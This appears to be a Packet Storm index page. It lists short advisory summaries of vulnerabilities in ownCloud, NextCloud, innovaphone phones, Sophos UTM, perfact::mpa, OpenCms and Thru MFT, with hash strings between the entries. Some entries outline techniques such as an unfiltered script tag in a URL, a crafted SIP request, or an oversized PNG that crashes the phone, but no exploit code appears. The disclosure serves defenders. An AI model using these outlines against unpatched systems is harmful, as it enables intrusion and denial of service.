ownCloud versions 8.2.1 and below, 8.1.4 and below, and 8.0.9 and below suffer from an information exposure vulnerability via directory listings.
2a03e49b47f5b92a36e0f7c8b25d095b6e9255abca3e8fe34b1f15409b04a89cOwnCloud version 8.1.8 suffers from a username disclosure vulnerability.
0307de97c325435adcb9198b8abdd9f7094e634c0324db4c86daa7772020153aownCloud version 10.3.0 Stable suffers from a cross site request forgery vulnerability.
c22b2a37ba5d1cb6b5858d7411c84b3b052ad0aa8deb6f83ddf846ab7d9d2e99ownCloud version 0.1.2 suffers from a user impersonation authorization bypass vulnerability.
29b952619c8992a8a4ce5753eaedfa7b6eaafa33618c92674d49b3731375dc42ownCloud version 3.7.3 for iOS suffers from a cross site scripting vulnerability.
60a743c516f85803a1928a7f4848da9eaf304718636f0a2239685f689d400f9cOwnCloud Server versions 8.1 through 10.0 suffer from a user enumeration vulnerability.
f37e67829e665a898bf68c2848f71f8bc90ffbb5b72d6424387b5e59ac1e5c43NextCloud and OwnCloud suffer from a cross site scripting vulnerability in their error pages. OwnCloud versions 9.1.5 and below are affected. NextCloud versions prior to 11.0.3, 10.0.5, and 9.0.58 are affected.
65879de6c3bc16a06a84fa76fc56c4fec014ee26d19bb377b0cde628a8e097a2ownCloud version 10.0.1 appears to be missing multiple patches for cross site scripting and more.
e3c48c0271c0c89ae80ecf8f0d0ab034e903539703cefb633858b163ea696d4bownCloud's desktop client versions up to 2.2.2 suffer from a local privilege escalation vulnerability.
b2623943c1aa93651044b4c1a58687459e6c32e5ec23cc3c6403bce318ee3b99The innovaphone IP222 provides a password protected administration interface, which can be accessed via a web browser. Although the basic authentication was disabled and instead the digest authentication is used, it is still possible to perform brute-force attacks against the password authentication process.
5a2d36d564fe004b8101678bcdc007666e0547fe8e23b7a50847efbc69680872At startup the innovaphone IP222 sends an HTTP request for a special PNG file to the involved server system. After the download has finished, the image is displayed on the phone by selecting the receiver screen in the menu. Providing a large image file (6.9 MB) within the download process and selecting the receiver screen on the phone will lead to a crash of the application and cause a denial of service condition. Remote code execution via this security vulnerability may also be possible, but was not confirmed by the SySS GmbH.
082b8f3575ba36bdc1044ed8d817104a1afb0c9d70e9163c8f9dfb60e5762b1aThe innovaphone IP222 offers different protocols, like H.323 or SIP, to fulfil the various requirements. The discovered vulnerability was found in the protocol SIP/UDP. Therefore a specially crafted SIP request to the open 5060/UDP port causes a denial of service condition by crashing the innovaphone IP222 phone immediately. Remote code execution via this security vulnerability may also be possible, but was not confirmed by the SySS GmbH.
cfc0d7614928d7e4d648a995ef8fdeb119a75e0ac44cc1cd7ece00e5e46a6931innovaphone versions IP222 and IP232 suffer from a remote denial of service vulnerability.
82d16c58171e185f50439ca2a3e3a97783090e29049d727064dcd3b319f9348eInserting an HTML 'script' tag into the URL of a web site protected by Sophos UTM 525 yields an error page which contains the 'script' tag unfiltered. Executing malicious JavaScript code in the victim's browser is therefore straightforward.
1eceff53bf6b122d6139c8726d40ddfbec1d153d9f984494053dc00259fcd5f7The SySS GmbH found out that different functions of the web application perfact::mpa are prone to persistent cross-site scripting attacks due to insufficient user input validation.
3de9ebd0a6d7d71bc98db0dbfca47d2036e6cb55c8c5730f0710bc34b796c3d7The SySS GmbH found out that different resources of the web application perfact::mpa can be directly accessed by the correct URL due to improper user authorization checks. That is, unauthorized users can access different functions of the perfact::mpa web application.
9ddb061b9a0b9ab1cc362d42499ce13c2180721efde797ef3793f8df0246c9b2The SySS GmbH found out that the web application perfact:mpa accepts user-controlled input via the URL parameter "redir" that can be used to redirect victims to an arbitrary site which simplifies so-called phishing attacks.
1240006c91f037df38cbcd2cbcc641d8f0ac32f2445fa4d65f159730f692deb7The SySS GmbH found out that any logged in user is able to download valid VPN configuration files of arbitrary existing remote sessions. All an intruder needs to know is the URL with the dynamic parameter "brsessid". Due to the modification of this incremental increasing integer value, it is possible to enumerate and download a valid VPN configuration file for every existing remote session.
0395cba8a67f491b8450abca96173ea16da49abe7cd6b3f2d88cf3e02d04710cThe tested web application perfact::mpa offers no protection against cross-site request forgery (CSRF) attacks. This kind of attack forces end users respectively their web browsers to perform unwanted actions in a web application context in which they are currently authenticated.
2b1425b7f0db4e14f7b33d9778f0a59b7e1c1b93b42771c51ac1b69ae8116af3SySS GmbH found out that unauthorized users are able to download arbitrary files of other users that have been uploaded via the file upload functionality. As the file names of uploaded files are incremental integer values, it is possible to enumerate and download all uploaded files without any authorization.
b599bdab77ad574016e3a7c31c5ca968b8a2daac827a37f269eb26e143e5fe99SySS GmbH found out that the request new user and translation functionalities of the web application perfact::mpa are prone to reflected cross-site scripting attacks.
c41cae5aadb2813a38940d61e582bbde74c6eac30c32083652ec5ccf789a03e0OpenCms version 9.5.2 suffers from a cross site scripting vulnerability.
90836f4c2cffaaf16a53502663f30a5c82ff5d7140b8933a573d1c03a30e34a1Thru Managed File Transfer Portal version 9.0.2 suffers from an insecure direct object reference vulnerability in the contacts list functionality.
04bf2eec97770c7bbdcc28f9522714c4b0542d404957116ca9741cfcd118f04aThru Managed File Transfer Portal version 9.0.2 suffers from an insecure direct object reference vulnerability in the upload functionality.
f0fc879814ce1f79dd42f81a3bfde9648a14d4d21f9c544a934eff7660ae4c39The Thru Managed File Transfer application version 9.0.2 allows both unauthenticated and authenticated users to upload files, including viruses.
178fc60f24aa280af3d976a9ac3ef913d89f1c7872bc906e522d80c60a97306bThru Managed File Transfer Portal version 9.0.2 suffers from an insecure direct object reference vulnerability that references log data.
2147fd1a7ff3b5ec34b6336e5ee66f68da4bfc155effb2b3a760db009af938d9
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Subscribe to an RSS Feed